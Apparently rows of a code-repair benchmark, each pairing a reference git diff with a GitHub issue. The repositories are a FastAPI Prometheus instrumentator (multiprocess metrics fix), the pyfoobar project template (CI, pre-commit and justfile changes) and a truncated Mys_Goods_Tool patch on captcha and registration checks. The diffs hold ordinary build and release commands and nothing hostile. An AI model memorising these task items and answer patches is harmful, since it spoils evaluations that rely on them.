- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"},
- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"},
- {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"},
- {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"},
- {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"},
- {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"},
- {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"},
- {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"},
- {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"},
- {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"},
- {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"},
- {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"},
- {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"},
- {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"},
- {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"},
-]
-
[[package]]
name = "requests"
version = "2.28.2"
@@ -1019,14 +928,14 @@ doc = ["pytoolconfig[doc]", "sphinx (>=4.5.0)", "sphinx-autodoc-typehints (>=1.1
[[package]]
name = "setuptools"
-version = "67.4.0"
+version = "67.6.0"
description = "Easily download, build, install, upgrade, and uninstall Python packages"
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "setuptools-67.4.0-py3-none-any.whl", hash = "sha256:f106dee1b506dee5102cc3f3e9e68137bbad6d47b616be7991714b0c62204251"},
- {file = "setuptools-67.4.0.tar.gz", hash = "sha256:e5fd0a713141a4a105412233c63dc4e17ba0090c8e8334594ac790ec97792330"},
+ {file = "setuptools-67.6.0-py3-none-any.whl", hash = "sha256:b78aaa36f6b90a074c1fa651168723acbf45d14cb1196b6f02c0fd07f17623b2"},
+ {file = "setuptools-67.6.0.tar.gz", hash = "sha256:2ee892cd5f29f3373097f5a814697e397cf3ce313616df0af11231e2ad118077"},
]
[package.extras]
@@ -1172,28 +1081,6 @@ typing-extensions = {version = "*", markers = "python_version < \"3.8\""}
[package.extras]
standard = ["colorama (>=0.4)", "httptools (>=0.5.0)", "python-dotenv (>=0.13)", "pyyaml (>=5.1)", "uvloop (>=0.14.0,!=0.15.0,!=0.15.1)", "watchfiles (>=0.13)", "websockets (>=10.4)"]
-[[package]]
-name = "virtualenv"
-version = "20.16.2"
-description = "Virtual Python Environment builder"
-category = "dev"
-optional = false
-python-versions = ">=3.6"
-files = [
- {file = "virtualenv-20.16.2-py2.py3-none-any.whl", hash = "sha256:635b272a8e2f77cb051946f46c60a54ace3cb5e25568228bd6b57fc70eca9ff3"},
- {file = "virtualenv-20.16.2.tar.gz", hash = "sha256:0ef5be6d07181946891f5abc8047fda8bc2f0b4b9bf222c64e6e8963baee76db"},
-]
-
-[package.dependencies]
-distlib = ">=0.3.1,<1"
-filelock = ">=3.2,<4"
-importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
-platformdirs = ">=2,<3"
-
-[package.extras]
-docs = ["proselint (>=0.10.2)", "sphinx (>=3)", "sphinx-argparse (>=0.2.5)", "sphinx-rtd-theme (>=0.4.3)", "towncrier (>=21.3)"]
-testing = ["coverage (>=4)", "coverage-enable-subprocess (>=1)", "flaky (>=3)", "packaging (>=20.0)", "pytest (>=4)", "pytest-env (>=0.6.2)", "pytest-freezegun (>=0.4.1)", "pytest-mock (>=2)", "pytest-randomly (>=1)", "pytest-timeout (>=1)"]
-
[[package]]
name = "zipp"
version = "3.15.0"
@@ -1213,4 +1100,4 @@ testing = ["big-O", "flake8 (<5)", "jaraco.functools", "jaraco.itertools", "more
[metadata]
lock-version = "2.0"
python-versions = ">= 3.7.0, < 4.0.0"
-content-hash = "0868d18794b8cf54d229a6e87779ef8129f3b7cc2d86dea9e19f4a5d232f054c"
+content-hash = "a6fdc9d73c0e827a98d867e644f701814890de69f5499aaac9ef9120af08c410"
diff --git a/pyproject.toml b/pyproject.toml
index 0afdadf..a0c50c5 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -16,22 +16,22 @@ keywords = ["prometheus", "instrumentation", "fastapi", "exporter", "metrics"]
python = ">= 3.7.0, < 4.0.0"
fastapi = ">= 0.38.1, < 1.0.0"
prometheus-client = ">= 0.8.0, < 1.0.0"
-starlette = "0.25.0"
[tool.poetry.group.dev.dependencies]
-httpx = "^0.23.1"
-black = "^22.12.0"
+httpx = "^0.23.3"
+black = "^23.1.0"
flake8 = "^5.0.4"
-requests = "^2.28.1"
-pytest = "^7.2.0"
-pytest-cov = "^3.0.0"
-rope = "^1.6.0"
+requests = "^2.28.2"
+pytest = "^7.2.2"
+pytest-cov = "^4.0.0"
+rope = "^1.7.0"
isort = "^5.11.3"
-mypy = "^0.971"
-devtools = "^0.9.0"
-pre-commit = "^2.20.0"
-asgiref = "^3.5.2"
+mypy = "^1.1.1"
+devtools = "^0.10.0"
+asgiref = "^3.6.0"
uvicorn = "^0.20.0"
+gunicorn = "^20.1.0"
+pytest-asyncio = "^0.20.3"
[tool.black]
line-length = 90
@@ -46,3 +46,4 @@ ignore_missing_imports = true
[tool.pytest.ini_options]
norecursedirs = "tests/helpers"
markers = ["slow: mark test as slow."]
+asyncio_mode = "auto"
diff --git a/src/prometheus_fastapi_instrumentator/instrumentation.py b/src/prometheus_fastapi_instrumentator/instrumentation.py
index 2fd4cca..82a75d5 100644
--- a/src/prometheus_fastapi_instrumentator/instrumentation.py
+++ b/src/prometheus_fastapi_instrumentator/instrumentation.py
@@ -32,7 +32,7 @@ def __init__(
should_round_latency_decimals: bool = False,
should_respect_env_var: bool = False,
should_instrument_requests_inprogress: bool = False,
- excluded_handlers: List[str] = None,
+ excluded_handlers: List[str] = [],
round_latency_decimals: int = 4,
env_var_name: str = "ENABLE_METRICS",
inprogress_name: str = "http_requests_inprogress",
@@ -109,9 +109,6 @@ def __init__(
self.inprogress_name = inprogress_name
self.inprogress_labels = inprogress_labels
- if excluded_handlers is None:
- excluded_handlers = []
-
self.excluded_handlers = [re.compile(path) for path in excluded_handlers]
self.instrumentations: List[Callable[[metrics.Info], None]] = []
@@ -131,17 +128,15 @@ def __init__(
if registry:
self.registry = registry
- elif "PROMETHEUS_MULTIPROC_DIR" in os.environ:
+ else:
+ self.registry = REGISTRY
+
+ if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
pmd = os.environ["PROMETHEUS_MULTIPROC_DIR"]
- if os.path.isdir(pmd):
- self.registry = CollectorRegistry()
- multiprocess.MultiProcessCollector(self.registry)
- else:
+ if not os.path.isdir(pmd):
raise ValueError(
f"Env var PROMETHEUS_MULTIPROC_DIR='{pmd}' not a directory."
)
- else:
- self.registry = REGISTRY
def instrument(
self,
@@ -255,12 +250,19 @@ def expose(
def metrics(request: Request):
"""Endpoint that serves Prometheus metrics."""
+ ephemeral_registry = self.registry
+ if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
+ ephemeral_registry = CollectorRegistry()
+ multiprocess.MultiProcessCollector(ephemeral_registry)
+
if should_gzip and "gzip" in request.headers.get("Accept-Encoding", ""):
- resp = Response(content=gzip.compress(generate_latest(self.registry)))
+ resp = Response(
+ content=gzip.compress(generate_latest(ephemeral_registry))
+ )
resp.headers["Content-Type"] = CONTENT_TYPE_LATEST
resp.headers["Content-Encoding"] = "gzip"
else:
- resp = Response(content=generate_latest(self.registry))
+ resp = Response(content=generate_latest(ephemeral_registry))
resp.headers["Content-Type"] = CONTENT_TYPE_LATEST
return resp
| Multi process mode does not work as expected
The way expose currently works does not follow documentation from Prometheus client library.
Cannot See Multiprocess metric under /metric page while suing multiple workers
Basically, there are two weird things while loading /metric page
1. I can see two lines of http_requests_total{handler="/metrics",method="GET",status="2xx"} 33.0. And, it looks like one is not correct. Then, I think this problem related to https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/50
```
# HELP http_requests_total Total number of requests by method, status and handler.
# TYPE http_requests_total counter
http_requests_total{handler="/metrics",method="GET",status="2xx"} 33.0
# HELP http_request_size_bytes Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated.
# TYPE http_request_size_bytes summary
http_request_size_bytes_count{handler="/metrics"} 33.0
http_request_size_bytes_sum{handler="/metrics"} 0.0
# HELP http_response_size_bytes Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated.
# TYPE http_response_size_bytes summary
http_response_size_bytes_count{handler="/metrics"} 33.0
http_response_size_bytes_sum{handler="/metrics"} 235523.0
# HELP http_requests_total Total number of requests by method, status and handler.
# TYPE http_requests_total counter
http_requests_total{handler="/metrics",method="GET",status="2xx"} 7.0
```
2. Second strange thing is I already provide **PROMETHEUS_MULTIPROC_DIR=/tmp/prometheus-fastapi-instrumentator/multiproc.** However, I cannot see **Multiprocess metric** under /metric page
It would be appreciated any feedback about is this fixed already or any alternative solutin.
Appreciated.
@trallnag
|
<img width="1587" alt="image" src="https://user-images.githubusercontent.com/22557099/223348059-033aa161-05c1-48da-b830-5a08b7bc23e6.png">
I put the screenshot that I already go inside the container to double check if PROMETHEUS_MULTIPROC_DIR is successfully created. Hope this information helps troubleshhot | 2023-03-08T16:14:15 | 0.0 | [] | [] |
||
nschloe/pyfoobar | nschloe__pyfoobar-15 | 1db016c755a2105fad7afdcd2087ab0a857857e5 | diff --git a/.circleci/config.yml b/.circleci/config.yml
index 111ab1b..be23eee 100644
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -6,11 +6,8 @@ jobs:
- image: circleci/python:3
steps:
- checkout
- - run: pip3 install black flake8 isort
- # isort isn't compatible with black yet:
- # https://github.com/timothycrosley/isort/issues/694
- # https://github.com/python/black/issues/333
- # - run: isort --check -rc .
+ - run: pip install black flake8 isort
+ - run: isort --check .
- run: black --check .
- run: flake8 .
build:
@@ -18,13 +15,11 @@ jobs:
docker:
- image: circleci/python:3
steps:
- - run: pip3 install pytest pytest-cov
+ - run: pip install tox
- checkout
- - run: pip3 install .[all]
# The tests
- run:
- command: pytest --cov pyfoobar
- working_directory: test/
+ command: tox -- --cov pyfoobar --cov-report xml --cov-report term
env:
MPLBACKEND: Agg
# submit to codecov
diff --git a/.codecov.yml b/.codecov.yml
index 0421fdf..a052f98 100644
--- a/.codecov.yml
+++ b/.codecov.yml
@@ -1,7 +1,1 @@
comment: no
-# https://github.com/codecov/support/issues/396#issuecomment-300879528
-codecov:
- disable_default_path_fixes: true
-fixes:
- - ".*/dist-packages/::"
- - ".*/site-packages/::"
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 1618cd8..a471597 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -12,18 +12,12 @@ jobs:
lint:
runs-on: ubuntu-latest
steps:
- - uses: actions/setup-python@v2
- with:
- python-version: "3.x"
- - uses: actions/checkout@v2
- - name: Lint with flake8
- run: |
- pip install flake8
- flake8 .
- - name: Lint with black
- run: |
- pip install black
- black --check .
+ - name: Check out repo
+ uses: actions/checkout@v2
+ - name: Set up Python
+ uses: actions/setup-python@v2
+ - name: Run pre-commit
+ uses: pre-commit/[email protected]
build:
runs-on: ubuntu-latest
@@ -38,7 +32,7 @@ jobs:
- name: Test with tox
run: |
pip install tox
- tox
+ tox -- --cov pyfoobar --cov-report xml --cov-report term
- name: Submit to codecov
uses: codecov/codecov-action@v1
if: ${{ matrix.python-version == '3.9' }}
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
new file mode 100644
index 0000000..d9d495b
--- /dev/null
+++ b/.pre-commit-config.yaml
@@ -0,0 +1,16 @@
+repos:
+ - repo: https://github.com/PyCQA/isort
+ rev: 5.9.1
+ hooks:
+ - id: isort
+
+ - repo: https://github.com/psf/black
+ rev: 21.6b0
+ hooks:
+ - id: black
+ language_version: python3
+
+ - repo: https://gitlab.com/pycqa/flake8
+ rev: 3.9.2
+ hooks:
+ - id: flake8
diff --git a/.travis.yml b/.travis.yml
index 17cc8c5..f19fef9 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,12 +1,9 @@
language: python
python:
- - "3.6"
+ - "3.9"
-# command to install dependencies
install:
- - pip3 install .
+ - pip install tox
-# command to run tests
script:
- - cd test/
- - pytest
+ - tox
diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md
index bd735ee..f0deae5 100644
--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -68,10 +68,10 @@ members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
-available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
+available at https://www.contributor-covenant.org/version/1/4/code-of-conduct/
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
-https://www.contributor-covenant.org/faq
+https://www.contributor-covenant.org/faq/
diff --git a/Makefile b/Makefile
deleted file mode 100644
index f0ac654..0000000
--- a/Makefile
+++ /dev/null
@@ -1,34 +0,0 @@
-VERSION=$(shell python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['version'])")
-
-default:
- @echo "\"make publish\"?"
-
-# https://packaging.python.org/distributing/#id72
-upload:
- # Make sure we're on the main branch
- @if [ "$(shell git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
- rm -f dist/*
- # python3 setup.py sdist bdist_wheel
- # https://stackoverflow.com/a/58756491/353337
- python3 -m build --sdist --wheel .
- twine upload dist/*
-
-tag:
- @if [ "$(shell git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
- # Always create a github "release"; this automatically creates a Git tag, too.
- curl -H "Authorization: token `cat $(HOME)/.github-access-token`" -d '{"tag_name": "v$(VERSION)"}' https://api.github.com/repos/nschloe/pyfoobar/releases
-
-publish: tag upload
-
-clean:
- @find . | grep -E "(__pycache__|\.pyc|\.pyo$\)" | xargs rm -rf
- @rm -rf *.egg-info/ build/ dist/ MANIFEST .pytest_cache/
-
-format:
- isort -rc .
- black .
-
-lint:
- isort --check -rc .
- black --check .
- flake8 .
diff --git a/README.md b/README.md
index c08b09c..3a1ffb5 100644
--- a/README.md
+++ b/README.md
@@ -1,13 +1,13 @@
# pyfoobar
-[](https://pypi.org/project/pyfoobar)
-[](https://pypi.org/pypi/pyfoobar/)
+[](https://pypi.org/project/pyfoobar/)
+[](https://pypi.org/project/pyfoobar/)
[](https://github.com/nschloe/pyfoobar)
[](https://pypistats.org/packages/pyfoobar)
[](https://github.com/nschloe/pyfoobar/actions?query=workflow%3Aci)
-[](https://circleci.com/gh/nschloe/pyfoobar/tree/main)
-[](https://travis-ci.org/nschloe/pyfoobar)
+[](https://circleci.com/gh/nschloe/pyfoobar/tree/main)
+[](https://travis-ci.com/nschloe/pyfoobar)
[](https://codecov.io/gh/nschloe/pyfoobar)
[](https://lgtm.com/projects/g/nschloe/pyfoobar)
[](https://github.com/psf/black)
@@ -27,19 +27,18 @@ for your new Python project.
* Your package should be a **one-trick pony**. Nobody wants to install a huge toolbox if
all they need is the image converter in it.
-* After `import yourpackagename`, people should be able to call
- `yourpackagename.__version__`. This helps with debugging.
-
* Choose a **license** for your code and provide a `LICENSE[.txt]` in the root level of
your package as well as a statement in your main README.
[choosealicense.com](https://choosealicense.com/) can help you make a decision.
* Use **linting and formatting**, include those in your integration tests.
- - [black](https://github.com/python/black) is a formatter that I like because you
+ - [black](https://github.com/psf/black) is a formatter that I like because you
cannot configure it -- black is black.
- Good linters are [flake8](http://flake8.pycqa.org/en/latest/) and
[pylint](https://www.pylint.org/).
- [isort](https://pypi.org/project/isort/) sorts your imports.
+ - [pre-commit](https://pre-commit.com/) has gained some popularity. It runs your
+ linters and formatters on every commit. Not more "lint fix" commits.
* Once you have tests in order, make sure they are executed with every git push.
Popular **CI services** that run your tests are [GitHub
@@ -52,7 +51,7 @@ for your new Python project.
administrators_. Development happens in pull requests, this makes sure that nobody --
including yourself -- ever accidentally pushes something broken to main.
-* Use a tool for measuring **test coverage**. [codecov](https://codecov.io/) is one, and
+* Use a tool for measuring **test coverage**. [codecov](https://about.codecov.io/) is one, and
your CI provider submits the data to it.
* If you have CI set up, want to show test coverage, or advertise
@@ -62,36 +61,35 @@ for your new Python project.
* Include [**contributing guidelines**](CONTRIBUTING.md) and a [**code of
conduct**](CODE_OF_CONDUCT.md) (edit to add appropriate
[enforcement](CODE_OF_CONDUCT.md#enforcement) contacts or [use a
- template](https://help.github.com/en/articles/adding-a-code-of-conduct-to-your-project))
+ template](https://docs.github.com/en/communities/setting-up-your-project-for-healthy-contributions/adding-a-code-of-conduct-to-your-project))
to help foster a community.
### What you can do with this template
First run
```
-find . -type f -print0 -name "*.py" -o -name Makefile -o -name "*.yml" | xargs -0 sed -i 's/pyfoobar/your-project-name/g'
+find . -type f -print0 -name "*.py" -o -name "*.yml" | xargs -0 sed -i 's/pyfoobar/your-project-name/g'
```
-and rename the folder `pyfoobar` to customize the name.
+and rename the folder `src/pyfoobar` to customize the name.
-There is a simple `Makefile` that can help you with certain tasks:
- * Run `make format` to apply formatting.
- * Run `make lint` to check formatting and style.
- * Run `make publish` to
- - tag your project on git (`make tag`)
- - upload your package to PyPi (`make upload`)
+There is a simple [`justfile`](https://github.com/casey/just) that can help you with
+certain tasks:
+ * Run `just format` to apply formatting.
+ * Run `just lint` to check formatting and style.
+ * Run `just publish` to
+ - tag your project on git (`just tag`)
+ - upload your package to PyPi (`just upload`)
After publishing, people can install your package with
```
- pip3 install pyfoobar
+ pip install pyfoobar
```
### Testing
-
To run the pyfoobar unit tests, check out this repository and do
```
tox
```
### License
-
pyfoobar is published under the [MIT license](https://en.wikipedia.org/wiki/MIT_License).
diff --git a/justfile b/justfile
new file mode 100644
index 0000000..d8b8f7c
--- /dev/null
+++ b/justfile
@@ -0,0 +1,31 @@
+version := `python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['version'])"`
+name := `python3 -c "from configparser import ConfigParser; p = ConfigParser(); p.read('setup.cfg'); print(p['metadata']['name'])"`
+
+
+default:
+ @echo "\"just publish\"?"
+
+tag:
+ @if [ "$(git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
+ curl -H "Authorization: token `cat ~/.github-access-token`" -d '{"tag_name": "{{version}}"}' https://api.github.com/repos/nschloe/{{name}}/releases
+
+upload: clean
+ @if [ "$(git rev-parse --abbrev-ref HEAD)" != "main" ]; then exit 1; fi
+ # https://stackoverflow.com/a/58756491/353337
+ python3 -m build --sdist --wheel .
+ twine upload dist/*
+
+publish: tag upload
+
+clean:
+ @find . | grep -E "(__pycache__|\.pyc|\.pyo$)" | xargs rm -rf
+ @rm -rf src/*.egg-info/ build/ dist/ .tox/
+
+format:
+ isort .
+ black .
+ blacken-docs README.md
+
+lint:
+ black --check .
+ flake8 .
diff --git a/pyproject.toml b/pyproject.toml
index 8fe2f47..3c2aae9 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,3 +1,6 @@
[build-system]
requires = ["setuptools>=42", "wheel"]
build-backend = "setuptools.build_meta"
+
+[tool.isort]
+profile = "black"
diff --git a/setup.cfg b/setup.cfg
index b91a84d..a720f98 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,6 +1,6 @@
[metadata]
name = pyfoobar
-version = 0.0.5
+version = 0.0.6
author = Nico Schlömer
author_email = [email protected]
description = Best practices for Python projects
@@ -16,7 +16,6 @@ project_urls =
long_description = file: README.md
long_description_content_type = text/markdown
license = MIT
-license_file = LICENSE
# See <https://pypi.org/classifiers/> for all classifiers.
classifiers =
Development Status :: 4 - Beta
@@ -32,10 +31,15 @@ classifiers =
Topic :: Utilities
[options]
+package_dir =
+ =src
packages = find:
install_requires =
importlib_metadata;python_version<"3.8"
-python_requires = >=3.5
+python_requires = >=3.6
+
+[options.packages.find]
+where=src
[options.entry_points]
console_scripts =
diff --git a/pyfoobar/__about__.py b/src/pyfoobar/__about__.py
similarity index 100%
rename from pyfoobar/__about__.py
rename to src/pyfoobar/__about__.py
diff --git a/pyfoobar/__init__.py b/src/pyfoobar/__init__.py
similarity index 100%
rename from pyfoobar/__init__.py
rename to src/pyfoobar/__init__.py
diff --git a/pyfoobar/cli.py b/src/pyfoobar/cli.py
similarity index 100%
rename from pyfoobar/cli.py
rename to src/pyfoobar/cli.py
diff --git a/pyfoobar/main.py b/src/pyfoobar/main.py
similarity index 100%
rename from pyfoobar/main.py
rename to src/pyfoobar/main.py
diff --git a/tox.ini b/tox.ini
index e98047f..42fdd9b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -5,7 +5,8 @@ isolated_build = True
[testenv]
deps =
pytest
+ pytest-codeblocks
pytest-cov
extras = all
commands =
- pytest --cov {envsitepackagesdir}/pyfoobar --cov-report xml --cov-report term
+ pytest {posargs} --codeblocks
| isort upgrade
On running `make lint`
```bash
isort -rc .
Skipped 1 files
/home/rohan/anaconda3/envs/nbdev/lib/python3.8/site-packages/isort/main.py:1233: UserWarning: W0501: The following deprecated CLI flags were used and ignored: -rc!
warn(
/home/rohan/anaconda3/envs/nbdev/lib/python3.8/site-packages/isort/main.py:1237: UserWarning: W0500: Please see the 5.0.0 Upgrade guide: https://pycqa.github.io/isort/docs/upgrade_guides/5.0.0.html
warn(
```
https://pycqa.github.io/isort/docs/upgrade_guides/5.0.0.html
| 2021-08-08T15:58:43 | 0.0 | [] | [] |
|||
Ljzd-PRO/Mys_Goods_Tool | Ljzd-PRO__Mys_Goods_Tool-112 | 213d0821b434ad000a832dfbef108b89a2164fdd | diff --git a/README.md b/README.md
index 63768195..4b058521 100644
--- a/README.md
+++ b/README.md
@@ -16,10 +16,10 @@
### 更新说明
-- 修复定时兑换无效的问题
-- 修复失去网络连接的情况下会导致程序退出的Bug
-- 对于 Linux 使用 Ubuntu 20.04 进行构建,防止出现缺少 GNU libc 对应版本的问题
-- 非 Windows 系统增加 [uvloop](https://github.com/MagicStack/uvloop) 支持,提高性能
+- 修复启动后由于商品数据相关问题而导致的崩溃
+- 修复 Linux 实际不会应用 uvloop 的问题
+- 人机验证更新至
+ GT4(但实际上暂时不可用 [#105](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues/105#issuecomment-1552727784))
## 功能和特性
diff --git a/mys_goods_tool/api.py b/mys_goods_tool/api.py
index c60ea3ca..7d2a48c4 100644
--- a/mys_goods_tool/api.py
+++ b/mys_goods_tool/api.py
@@ -3,13 +3,12 @@
import httpx
import tenacity
-from httpx import ConnectError
from pydantic import ValidationError, BaseModel
from requests.utils import dict_from_cookiejar
from mys_goods_tool.data_model import GameRecord, GameInfo, Good, Address, BaseApiStatus, MmtData, GeetestResult, \
GetCookieStatus, \
- CreateMobileCaptchaStatus, GetGoodDetailStatus, ExchangeStatus
+ CreateMobileCaptchaStatus, GetGoodDetailStatus, ExchangeStatus, GeetestResultV4
from mys_goods_tool.user_data import config as conf, UserAccount, BBSCookies, ExchangePlan, ExchangeResult
from mys_goods_tool.utils import generate_device_id, logger, generate_ds, Subscribe, \
NtpTime, get_async_retry
@@ -286,7 +285,7 @@ def wrong_captcha(self):
"""
是否返回验证码错误
"""
- return self.retcode == -201 or self.message in ["验证码错误", "Captcha not match Err"]
+ return self.retcode in [-201, -302] or self.message in ["验证码错误", "Captcha not match Err"]
@property
def login_expired(self):
@@ -631,86 +630,109 @@ async def get_address(account: UserAccount, retry: bool = True) -> Tuple[BaseApi
return BaseApiStatus(success=True), address_list
-async def check_registrable(phone_number: int, retry: bool = True) -> Tuple[BaseApiStatus, Optional[bool]]:
+async def check_registrable(phone_number: int, keep_client: bool = False, retry: bool = True) -> Tuple[
+ BaseApiStatus, Optional[bool], str, Optional[httpx.AsyncClient]]:
"""
检查用户是否可以注册
+ :param keep_client: httpx.AsyncClient 连接是否需要关闭
:param phone_number: 手机号
:param retry: 是否允许重试
+ :return: (API返回状态, 用户是否可以注册, 设备ID, httpx.AsyncClient连接对象)
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
+ device_id = generate_device_id()
+ headers["x-rpc-device_id"] = device_id
+
+ async def request():
+ """
+ 发送请求的闭包函数
+ """
+ time_now = round(NtpTime.time() * 1000)
+ # await client.options(URL_REGISTRABLE.format(mobile=phone_number, t=time_now),
+ # headers=headers, timeout=conf.preference.timeout)
+ return await client.get(URL_REGISTRABLE.format(mobile=phone_number, t=time_now),
+ headers=headers, timeout=conf.preference.timeout)
+
try:
async for attempt in get_async_retry(retry):
with attempt:
- async with httpx.AsyncClient() as client:
- res = await client.get(URL_REGISTRABLE.format(mobile=phone_number, t=round(NtpTime.time() * 1000)),
- headers=headers, timeout=conf.preference.timeout)
- api_result = ApiResultHandler(res.json())
- return BaseApiStatus(success=True), bool(api_result.data["is_registable"])
+ if keep_client:
+ client = httpx.AsyncClient()
+ else:
+ async with httpx.AsyncClient() as client:
+ res = await request()
+ res = await request()
+ api_result = ApiResultHandler(res.json())
+ return BaseApiStatus(success=True), bool(api_result.data["is_registable"]), device_id, client
except tenacity.RetryError as e:
+ if keep_client:
+ await client.aclose()
if is_incorrect_return(e):
logger.exception(f"检查用户 {phone_number} 是否可以注册 - 服务器没有正确返回")
logger.debug(f"网络请求返回: {res.text}")
- return BaseApiStatus(incorrect_return=True), None
+ return BaseApiStatus(incorrect_return=True), None, device_id, client
else:
logger.exception(f"检查用户 {phone_number} 是否可以注册 - 请求失败")
- return BaseApiStatus(network_error=True), None
+ return BaseApiStatus(network_error=True), None, device_id, None
-async def create_mmt(keep_client: bool = False, retry: bool = True) -> Tuple[
- BaseApiStatus, Optional[MmtData], Optional[httpx.AsyncClient]]:
+async def create_mmt(client: Optional[httpx.AsyncClient] = None,
+ use_v4: bool = True,
+ device_id: str = generate_device_id(),
+ retry: bool = True) -> Tuple[
+ BaseApiStatus, Optional[MmtData], str, Optional[httpx.AsyncClient]]:
"""
发送短信验证前所需的人机验证任务申请
- :param keep_client: httpx.AsyncClient 连接是否需要关闭
+ :param client: httpx.AsyncClient 连接
+ :param use_v4: 是否使用极验第四代人机验证
+ :param device_id: 设备 ID
:param retry: 是否允许重试
+ :return: (API返回状态, 人机验证任务数据, 设备ID, httpx.AsyncClient连接对象)
"""
headers = HEADERS_WEBAPI.copy()
- headers["x-rpc-device_id"] = generate_device_id()
-
+ headers["x-rpc-device_id"] = device_id
+ if use_v4:
+ headers.setdefault("x-rpc-source", "accountWebsite")
async def request():
"""
发送请求的闭包函数
"""
time_now = round(NtpTime.time() * 1000)
- await client.options(URL_CREATE_MMT.format(now=time_now, t=time_now),
- headers=headers, timeout=conf.preference.timeout)
+ # await client.options(URL_CREATE_MMT.format(now=time_now, t=time_now),
+ # headers=headers, timeout=conf.preference.timeout)
return await client.get(URL_CREATE_MMT.format(now=time_now, t=time_now),
headers=headers, timeout=conf.preference.timeout)
try:
async for attempt in get_async_retry(retry):
with attempt:
- if keep_client:
- client = httpx.AsyncClient()
+ if client:
res = await request()
else:
async with httpx.AsyncClient() as client:
res = await request()
